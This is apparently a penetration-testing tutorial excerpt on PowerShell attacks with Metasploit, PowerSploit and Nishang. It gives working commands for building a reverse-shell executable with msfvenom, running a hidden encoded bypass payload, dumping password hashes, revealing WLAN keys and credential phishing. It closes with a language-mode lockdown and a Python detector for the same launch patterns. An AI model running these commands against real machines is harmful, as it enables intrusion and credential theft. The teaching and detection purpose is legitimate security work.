PowerShell attacks are already integrated into Metasploit. You can check by using the search command:
msf> search powershell
Now it is time to learn how to use Metasploit with PowerShell. For a demonstration of one of the many uses, you can convert a PowerShell script into an executable file using the msfvenom utility:
>msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.39 LPORT=4444 -f exe > evilPS.exe
>msfvenom -p windows/exec CMD="powershell -ep bypass -W Hidden -enc [Powershell script Here]" -f exe -e x86/shikata_ga_nai -o /root/home/ghost/Desktop/power.exe
PowerSploit is an amazing set of PowerShell scripts used by information security professionals, and especially penetration testers. To download PowerSploit, you need to grab it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit:
# git clone https://github.com/PowerShellMafia/PowerSploit
After cloning the project, use the ls command to list the files:
From the following screenshot, you can note that PowerSploit contains a lot of amazing scripts for performing a number of tasks, such as:
Nishang is a great collection of tools used to perform many tasks during all the penetration testing phases. You can get it from https://github.com/samratashok/nishang:
# git clone https://github.com/samratashok/nishang
As you can see from listing the downloaded project, Nishang is loaded with many scripts and utilities for performing the tasks required during penetration testing missions, such as:
You can explore all the available scripts by listing the content of Nishang project using the ls command:
Let's explore some of Nishang's script power on a Windows machine:
You can import all the modules using the Import-Module PowerShell cmdlet:
Oops, something went wrong! Don't worry: in order to use Import-Module, you need to open PowerShell as an administrator and type Set-ExecutionPolicy -ExecutionPolicy RemoteSigned:
Then you can import the modules:
Now, if you want, for example, to use the Get-Information module, you just need to type Get-Information:
If you want to unveil WLAN keys, type Get-WLAN-Keys:
You can go further and dump password hashes from a target machine in a post-exploitation mission. Thanks to the Get-PassHashes module, you are able to dump password hashes. This is the output of it from my local machine:
However, if you want to pop the command after getting a shell, use:
powershell.exe -exec bypass -Command "& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1'; Get-PassHashes}"
You can even perform a phishing attack using Invoke-CredentialPhish, like in the previous demonstration. You can run this attack on the victim's machine:
In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to:
PS C:\Windows\system32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
$ExecutionContext.SessionState.LanguageMode
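Locking down the language mode is one side of the defense; the other is spotting the launch patterns shown earlier in this article (-ep bypass, -W Hidden, -enc, and Import-Module of Nishang scripts such as Get-PassHashes) in process-creation telemetry. The following Python snippet is an added example, not code from the article, Metasploit or Nishang; the command lines it scans are constructed samples, and the watchlist holds only the script names this article mentions.

```python
import base64
import re
from typing import Optional

def _enc(script: str) -> str:
    # PowerShell's -EncodedCommand takes base64 of the UTF-16LE bytes of the script
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed sample process command lines (not real telemetry). The first
# three mirror the launch patterns used in this article; the last is benign.
SAMPLE_EVENTS = [
    "powershell -ep bypass -W Hidden -enc " + _enc("Get-PassHashes"),
    "powershell.exe -exec bypass -Command \"& {Import-Module 'C:\\tmp\\Get-PassHashes.ps1'; Get-PassHashes}\"",
    "powershell.exe -NoProfile -Command \"Invoke-CredentialPhish\"",
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
]

# Nishang script names mentioned in this article; extend with your own watchlist.
WATCHLIST = {"Get-PassHashes", "Get-WLAN-Keys", "Invoke-CredentialPhish", "Get-Information"}

# Each rule names a suspicious launch flag; PowerShell accepts abbreviated parameter names,
# so the patterns cover the short forms as well as the full ones.
FLAG_RULES = [
    ("execution-policy bypass", re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded command", re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)),
]

def decode_encoded_command(b64: str) -> Optional[str]:
    """Recover the script behind -enc; returns None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline: str) -> dict:
    """Return matched rules, the decoded -enc script (if any) and watchlisted script names."""
    findings = {"cmdline": cmdline, "rules": [], "decoded": None, "scripts": []}
    for name, rx in FLAG_RULES:
        m = rx.search(cmdline)
        if m:
            findings["rules"].append(name)
            if name == "encoded command":
                findings["decoded"] = decode_encoded_command(m.group(1))
    # Match watchlisted names against the raw command line and the decoded script
    text = (cmdline + " " + (findings["decoded"] or "")).lower()
    findings["scripts"] = sorted(s for s in WATCHLIST if s.lower() in text)
    findings["suspicious"] = bool(findings["rules"] or findings["scripts"])
    return findings

def scan(events=SAMPLE_EVENTS) -> list:
    return [analyze(e) for e in events]
```

In production the same logic would run over Sysmon event 1 or Windows event 4688 command lines; tune the watchlist and rules to your own environment.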
Thus, in this article, we saw the combination of Metasploit and PowerShell used to perform more customized attacks and security tests. If you've enjoyed reading this post and want to learn how to exploit enterprise VLANs, going from theory to real-world experience, do check out Advanced Infrastructure Penetration Testing.